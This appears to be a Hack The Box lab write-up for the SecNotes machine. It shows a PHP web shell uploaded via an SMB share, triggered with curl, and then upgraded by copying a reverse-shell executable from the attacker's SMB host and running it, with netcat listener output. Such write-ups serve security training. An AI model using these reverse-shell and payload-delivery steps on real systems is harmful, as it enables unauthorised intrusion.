InfoSec LAB

SecNotes_Exploitation

Created: 3 min read

Arbitrary File Upload

It was confirmed that the //secnotes.htb/new-site SMB share is mirroring the web server running on the target port 8808

smb: \> put shell.php 
putting file shell.php as \shell.php (102.0 kb/s) (average 22.0 kb/s)

Delivering the payload to the web server running on the target port 8808 via SMB

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ curl http://secnotes.htb:8808/shell.php

Triggering the payload

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 58579
socket: Shell has connected! PID: 3340
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\inetpub\new-site> whoami
iis apppool\newsite
 
c:\inetpub\new-site> hostname
SECNOTES
 
c:\inetpub\new-site> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::250
   ipv6 address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   temporary ipv6 address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   link-local ipv6 address . . . . . : fe80::6832:cf76:958b:2105%11
   ipv4 address. . . . . . . . . . . : 10.10.10.97
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

Initial Foothold established to the target system as iis apppool\newsite via arbitrary file upload

Stabilizer

But, I am getting cut out as the shell is part of a process from a file that gets periodically deleted. So I need a find a way to establish a much stable shell environment

C:\inetpub\new-site> mkdir \tmp
C:\inetpub\new-site> cd \tmp
C:\tmp> copy \\10.10.14.10\smb\64ps9998.exe .
C:\tmp> 64ps9998.exe

I transferred an reverse shell executable to the \tmp directory that I made and executed it

I wish I could place the binary at the web root of the other web server so I can easily access it if need, but I don’t have permissions to do so to that directory; C:\inetpub\wwwroot

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 59038
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\tmp> whoami
iis apppool\newsite
PS C:\tmp> hostname
SECNOTES
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

It’s all good

Interactive Graph View

Backlinks